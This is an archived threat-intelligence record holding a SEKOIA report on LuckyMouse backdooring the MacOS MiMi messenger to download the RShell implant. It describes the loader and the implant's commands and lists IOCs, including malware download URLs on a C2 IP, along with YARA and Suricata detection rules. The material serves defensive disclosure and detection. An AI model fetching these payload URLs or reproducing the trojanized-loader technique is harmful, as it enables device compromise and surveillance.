{ "id": "ab9c27d4-08b0-4d7d-8dda-99f8cccbf928", "created_at": "2026-04-06T00:18:16.070432Z", "updated_at": "2026-04-10T03:37:21.63697Z", "deleted_at": null, "sha1_hash": "86c3f2f720c7c35b69cb2fffc2f9ff0d06351f3a", "title": "LuckyMouse uses a backdoored Electron app to target MacOS", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1127695, "plain_text": "LuckyMouse uses a backdoored Electron app to target MacOS\r\nBy Felix Aimé,\u0026nbsp;Charles M.\u0026nbsp;and\u0026nbsp;Sekoia TDR\r\nPublished: 2022-08-12 · Archived: 2026-04-05 14:17:51 UTC\r\nThis blog post on LuckyMouse is an extract of the “FLINT 2022-045 – LuckyMouse uses a backdoored Electron\r\napp to target MacOS” report (SEKOIA.IO Flash Intelligence) sent to our clients on August 10, 2022.\r\nNote: TrendMicro has published on the same campaign under the title : “Iron Tiger Compromises Chat\r\nApplication Mimi, Targets Windows, Mac, and Linux Users“.\r\nTable of contents\r\nSummary\r\nRShell Mach-O implant\r\nIOCs \u0026 Technical Details\r\nChat with our team!\r\nSummary\r\nDuring a review of the HyberBro Command and Control (C2) infrastructure linked to China-nexus LuckyMouse\r\nintrusion set, SEKOIA spotted an unusual connection with an application. Further investigation led to identify this\r\napplication as “MìMì” (秘秘 – “secret”, aka Mi). Mimi is a Chinese-speaking Electron App developed by Xiamen\r\nBaiquan Information Technology Co. Ltd. SEKOIA established that “MìMì” Messenger’s MacOS version is\r\ntrojanized since May 26, 2022  to download and execute a Mach-O binary dubbed “rshell”.\r\nAt this stage, SEKOIA is not able to assess the objective of this campaign. As this application’s use in China\r\nappears low, it is plausible it was developed as a targeted surveillance tool. It is also likely that, following\r\nsocial engineering carried out by the operators, targeted users are encouraged to download this application,\r\npurportedly to circumvent Chinese authorities’ censorship.\r\nThis is not the first time a messaging application dropping an implant connecting to the LuckyMouse\r\ninfrastructure is observed. In 2020, our ESET fellows uncovered compromised versions of Able Desktop, a\r\nmessaging application widely used in Mongolia in the “StealthyTrident” operation. In this campaign, Able\r\nDesktop was used to drop several implants, including PlugX, Tmanger and HyperBro, known to be a part of the\r\nLuckyMouse tool set.\r\nHowever, this is the first time that SEKOIA observed LuckyMouse targeting MacOS. Moreover, if this\r\napplication is exclusively used by Chinese citizens, it would be the first time that we identified LuckyMouse\r\ninvolved in domestic surveillance. This FLINT presents our findings on this campaign, including a description of\r\nthe Rshell implant, and associated IOCs.\r\n“MìMì” Messenger backdooring\r\nhttps://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/\r\nPage 1 of 8\n\nThe “Mi” Application is an Electron messaging app available for Android, iOS, Windows and MacOS platforms.\r\nAs Mi is not widely promoted, and its related website (www.mmimchat[.]com) doesn’t display a detailed\r\ndescription, general conditions of use or social media links, SEKOIA rapidly questioned its legitimacy.\r\nFigure 1. Mimi website at www.mmimchat[.]com\r\nMoreover,  the website hosted files were last modified on July 26. Based on the Apple Store change logs and\r\nPassive DNS, we figured that the first traces of this application dates back to June 2020. However, SEKOIA was\r\nnot able to assess whether this application is legit, or if it was designed or repurposed as a surveillance tool. \r\nAdditionally, based on our open source investigations, it is not possible to assess whether Xiamen Baiquan\r\nInformation Technology Co. Ltd. is a legit or a shell company.\r\nThe MacOS version of the “Mi” Application is an ElectronApp packaged in an Apple Disk Image file. This\r\napplication seems to be functional, where end users simply register themselves to be able to discuss with their\r\ncontacts. However, in version 2.3.0, published on May 26 2022, the\r\n./mimi.app/Contents/Resources/app/electron-main.js file was trojanized. As shown below, this was\r\nimplemented by placing a Dean Edwards Packed JavaScript code at the beginning of the module.exports function.\r\nFigure 2. Backdoored electron-main.js file.\r\nThis code, executed at the runtime, checks if the environment is MacOS (darwin) and then downloads the “rshell”\r\nimplant from 139.180.216.65, an IP address already associated to LuckyMouse HyperBro C2. The retrieved\r\nhttps://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/\r\nPage 2 of 8\n\npayload is written in the temp folder, chmoded with execution permission and then, executed as shown in the\r\ndeobfuscated code:\r\nFigure 3. Code responsible for downloading and executing RShell.\r\nWhile SEKOIA analysts checked Windows, iOS, and Android versions of the app, no backdoor was found in the\r\ncurrent versions. However, TrendMicro found old Linux and Windows versions backdoored. Read their\r\nanalysis here.\r\nRShell Mach-O implant\r\nThe downloaded implant, named RShell by its developers, is written in C++ and embeds the Boost.Asio and\r\nnlohmann/json libraries. This backdoor uses BJSON (Binary JSON) over TCP sockets to communicate with its\r\ncommand and control server, without any encryption and does not display a persistence mechanism.\r\nUpon execution, RShell backdoor attempts to connect with the C2 server. This “Hello message” to the C2 server\r\ncontains:\r\na random GUID, added to each response to the C2 server\r\nthe hostname\r\nthe IPv4 adresses\r\nthe type of connection (“login” for instance)\r\nthe current username\r\nthe kernel version.\r\nhttps://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/\r\nPage 3 of 8\n\nFigure 4. Hello packet from the implant.\r\nRShell backdoor accepts two “types” of commands: “cmd” and “file”. \r\nThe group “cmd” contains three commands:\r\ninit(): start a bash\r\ndata(data): write data to the bash\r\nclose(): ends up the bash.\r\nThe second type of commands, “file”, enable interactions with the filesystem:\r\ndir(path): returns a list of files and subdirectories for the specified path\r\ninit(): returns a list of files and subdirectories for the root filesystem (equivalent to dir(“/”))\r\ndown(path): opens a file in binary and read-only mode and returns the size of the file\r\nread(path): reads the specified file. The file must first have been opened with the down command\r\nupload(path): opens a file in binary and write-only mode\r\nwrite(data, path): writes data to the specified file. As for the read command, the file must first have been\r\nopened with the upload command before\r\ndel(path): delete the specified file or directory\r\nclose(path): closes the file\r\nThe following figures present an example of request and response for the dir command.\r\nFigure 5. Example of dir request\r\nhttps://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/\r\nPage 4 of 8\n\nFigure 6. Example of dir response\r\nA keepalive message is sent to the C2 server every 40 seconds. The server must echo this message. Based on this\r\nobservation, we created a Suricata rule to spot this threat in your network flows (see Appendix). \r\nLinks with LuckyMouse\r\nInfrastructure links were established between China-nexus Intrusion Set LuckyMouse and this operation.\r\nOf note, in the course of our investigation, the same HTTP server also served a HyperBro which was configured to\r\ncommunicate over HTTPs to 139.180.216[.]65. The malicious DLL of this HyperBro sample was signed by a\r\ncertificate known to be stolen and then used by LuckyMouse. The files launching this sample were accessible at\r\nthe following URLs:\r\nhttps://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/\r\nPage 5 of 8\n\nhttp://139.180.216.65/dlpumgr32.exe\r\nhxxp://139.180.216.65/dlpprem32.dll\r\nhxxp://139.180.216.65/dlpprem32.bin\r\nSecondly, both LuckyMouse and RShell operators use the same IP range, namely 103.79.76.0/22.\r\nWhile this IP range was recently used by LuckyMouse, notably to host three HyperBro C2 servers\r\n(103.79.77[.]200, 103.79.76[.]232, 103.79.78[.]48), two RShell C2 were also identified at 103.79.76[.]88 and\r\n103.79.77[.]178.\r\nFinally, as documented by ESET,  compromised messaging applications were already leveraged by LuckyMouse\r\nin past activities and this Intrusion Set was observed using Dean Edwards Javascript packer in previous watering\r\nhole campaigns.\r\nConclusion\r\nBased on our investigations, SEKOIA associate this activity to LuckyMouse with high confidence. It is\r\nplausible this activity indicates an expansion of LuckyMouse’s mandate, now including surveillance. However, as\r\nthis Intrusion Set was mostly observed continuously carrying out espionage activities, notably against the\r\ntechnology and governmental sectors, SEKOIA assess this hypothesis is unlikely.\r\nAt the time of writing, SEKOIA refrains from making any assessment on the Intrusion Set’s motivation and will\r\ncontinue to closely monitor their activities. Regardless of LuckyMouse’s goals, it is of particular interest to\r\nobserve the targeting of MacOS environment. SEKOIA assess this Intrusion Set will continue updating and\r\nimproving their capabilities in the short-term.\r\nIOCs \u0026 Technical Details\r\nRelated infrastructure\r\n103.79.76[.]88\r\n103.79.77[.]178\r\n139.180.216[.]65\r\nRShell hashes\r\n8c3be245cbbe9206a5d146017c14b8f965ab7045268033d70811d5bcc4b796ec rshell\r\n3a9e72b3810b320fa6826a1273732fee7a8e2b2e5c0fd95b8c36bbab970e830a rshell\r\nCompromised DMG images\r\nf6e0e5c9b9d43e008805644d937770b399f859cbba475ad837805d9adec13a2c 2.3.0.dmg\r\n4742c1987fdd968d7f094dc5a3ea3e9b5340b47e5a61846ac6ac7ae03fc7288f 2.3.1.dmg\r\nhttps://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/\r\nPage 6 of 8\n\n64e771c894616100202e83f3574f8accc8453138af6709367c99157e33bb613a 2.3.2.dmg\r\n466981b6aa38ae35a2c0e21a2066b4e803cc0bf76409eeb605892604c20ccf3a 2.3.3.dmg\r\nHyperBro implant\r\nWarning: dlpumgr32.exe is a legit file\r\nef2f20d1016cd39ff44f1399c8aa5c1ff5bfd4850d611ba375fbeff7f7e3eaf6 dlpprem32.bin\r\n22c3c2bf77a94ed5f207c00e240f558d6411308d237779ffb12e04bbe2c90356 dlpprem32.dll\r\n07758c93ba33843a9c5603f900f2ad0231c64ec77f6bba6de83ed6e2902022e4 dlpumgr32.exe\r\nYARA rules\r\nrule apt_LuckyMouse_RShell_strings {\r\n meta:\r\n id = \"89f18013-ea3e-440f-821e-cef102a43b7b\"\r\n version = \"1.0\"\r\n malware = \"RShell\"\r\n intrusion_set = \"LuckyMouse\"\r\n description = \"Detects LuckyMouse RShell Mach-O implant\"\r\n source = \"SEKOIA\"\r\n creation_date = \"2022-08-05\"\r\n classification = \"TLP:WHITE\"\r\n strings:\r\n $ = { 64 69 72 00 70 61 74 68\r\n 00 64 6F 77 6E 00 72 65\r\n 61 64 00 75 70 6C 6F 61\r\n 64 00 77 72 69 74 65 00\r\n 64 65 6C }\r\n $ = { 6C 6F 67 69 6E 00 68 6F\r\n 73 74 6E 61 6D 65 00 6C\r\n 61 6E 00 75 73 65 72 6E\r\n 61 6D 65 00 76 65 72 73\r\n 69 6F 6E }\r\n condition:\r\n uint32be(0) == 0xCFFAEDFE and\r\n filesize \u003c 300KB and\r\n all of them\r\n}\r\nrule apt_LuckyMouse_Compromised_ElectronApp {\r\n meta:\r\n id = \"7702217d-771f-47af-8eaa-d5acf1e14f4d\"\r\n version = \"1.0\"\r\n intrusion_set = \"LuckyMouse\"\r\n description = \"Detects compromised ElectronApp\"\r\n source = \"SEKOIA\"\r\nhttps://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/\r\nPage 7 of 8\n\ncreation_date = \"2022-08-05\"\r\n classification = \"TLP:WHITE\"\r\n strings:\r\n $s = \"module.exports=function(t){eval(function(p,a,c,k,e,r)\"\r\n condition:\r\n $s at 0 and filesize \u003c 100KB\r\n}\r\nSuricata rule\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (flow: from_client, established;content:\"|19 00 00 00 0\r\nYou can find out how we track threats on our SOC platform SEKOIA.IO.\r\nChat with our team!\r\nWould you like to know more about our solutions?\r\nDo you want to discover our XDR and CTI products?\r\nDo you have a cybersecurity project in your organization?\r\nMake an appointment and meet us!\r\nRead also :\r\nDiscover our:\r\nCTI platform\r\nXDR platform\r\nSOC platform\r\nTools for SOC analyst\r\nSIEM solution\r\nAPT APT27 BRONZE UNION EMISSARY PANDA Iron TIger LuckyMouse\r\nShare this post:\r\nSource: https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/\r\nhttps://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/" ], "report_names": [ "luckymouse-uses-a-backdoored-electron-app-to-target-macos" ], "threat_actors": [ { "id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c", "created_at": "2022-10-25T15:50:23.819113Z", "updated_at": "2026-04-10T02:00:05.354598Z", "deleted_at": null, "main_name": "Threat Group-3390", "aliases": [ "Threat Group-3390", "Earth Smilodon", "TG-3390", "Emissary Panda", "BRONZE UNION", "APT27", "Iron Tiger", "LuckyMouse", "Linen Typhoon" ], "source_name": "MITRE:Threat Group-3390", "tools": [ "Systeminfo", "gsecdump", "PlugX", "ASPXSpy", "Cobalt Strike", "Mimikatz", "Impacket", "gh0st RAT", "certutil", "China Chopper", "HTTPBrowser", "Tasklist", "netstat", "SysUpdate", "HyperBro", "ZxShell", "RCSession", "ipconfig", "Clambling", "pwdump", "NBTscan", "Pandora", "Windows Credential Editor" ], "source_id": "MITRE", "reports": null }, { "id": "c63ab035-f9f2-4723-959b-97a7b98b5942", "created_at": "2023-01-06T13:46:38.298354Z", "updated_at": "2026-04-10T02:00:02.917311Z", "deleted_at": null, "main_name": "APT27", "aliases": [ "BRONZE UNION", "Circle Typhoon", "Linen Typhoon", "TEMP.Hippo", "Budworm", "Lucky Mouse", "G0027", "GreedyTaotie", "Red Phoenix", "Iron Tiger", "Iron Taurus", "Earth Smilodon", "TG-3390", "EMISSARY PANDA", "Group 35", "ZipToken" ], "source_name": "MISPGALAXY:APT27", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43", "created_at": "2025-08-07T02:03:24.68371Z", "updated_at": "2026-04-10T02:00:03.64323Z", "deleted_at": null, "main_name": "BRONZE UNION", "aliases": [ "APT27 ", "Bowser", "Budworm ", "Circle Typhoon ", "Emissary Panda ", "Group35", "Iron Tiger ", "Linen Typhoon ", "Lucky Mouse ", "TG-3390 ", "Temp.Hippo " ], "source_name": "Secureworks:BRONZE UNION", "tools": [ "AbcShell", "China Chopper", "EAGERBEE", "Gh0st RAT", "OwaAuth", "PhantomNet", "PoisonIvy", "Sysupdate", "Wonknu", "Wrapikatz", "ZxShell", "reGeorg" ], "source_id": "Secureworks", "reports": null }, { "id": "5c13338b-eaed-429a-9437-f5015aa98276", "created_at": "2022-10-25T16:07:23.582715Z", "updated_at": "2026-04-10T02:00:04.675765Z", "deleted_at": null, "main_name": "Emissary Panda", "aliases": [ "APT 27", "ATK 15", "Bronze Union", "Budworm", "Circle Typhoon", "Earth Smilodon", "Emissary Panda", "G0027", "Group 35", "Iron Taurus", "Iron Tiger", "Linen Typhoon", "LuckyMouse", "Operation DRBControl", "Operation Iron Tiger", "Operation PZChao", "Operation SpoiledLegacy", "Operation StealthyTrident", "Red Phoenix", "TEMP.Hippo", "TG-3390", "ZipToken" ], "source_name": "ETDA:Emissary Panda", "tools": [ "ASPXSpy", "ASPXTool", "Agent.dhwf", "AngryRebel", "Antak", "CHINACHOPPER", "China Chopper", "Destroy RAT", "DestroyRAT", "FOCUSFJORD", "Farfli", "Gh0st RAT", "Ghost RAT", "HTTPBrowser", "HTran", "HUC Packet Transmit Tool", "HighShell", "HttpBrowser RAT", "HttpDump", "HyperBro", "HyperSSL", "HyperShell", "Kaba", "Korplug", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "Moudour", "Mydoor", "Nishang", "OwaAuth", "PCRat", "PlugX", "ProcDump", "PsExec", "RedDelta", "SEASHARPEE", "Sensocode", "SinoChopper", "Sogu", "SysUpdate", "TIGERPLUG", "TVT", "Thoper", "Token Control", "TokenControl", "TwoFace", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "Xamtrav", "ZXShell", "gsecdump", "luckyowa" ], "source_id": "ETDA", "reports": null }, { "id": "236429ce-6355-43f6-9b58-e6803a1df3f4", "created_at": "2026-03-16T02:02:50.60344Z", "updated_at": "2026-04-10T02:00:03.641587Z", "deleted_at": null, "main_name": "Bronze Union", "aliases": [ "Circle Typhoon ", "Emissary Panda " ], "source_name": "Secureworks:Bronze Union", "tools": [ "China Chopper", "OwaAuth", "Sysupdate" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434696, "ts_updated_at": 1775792241, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/86c3f2f720c7c35b69cb2fffc2f9ff0d06351f3a.pdf", "text": "https://archive.orkl.eu/86c3f2f720c7c35b69cb2fffc2f9ff0d06351f3a.txt", "img": "https://archive.orkl.eu/86c3f2f720c7c35b69cb2fffc2f9ff0d06351f3a.jpg" } }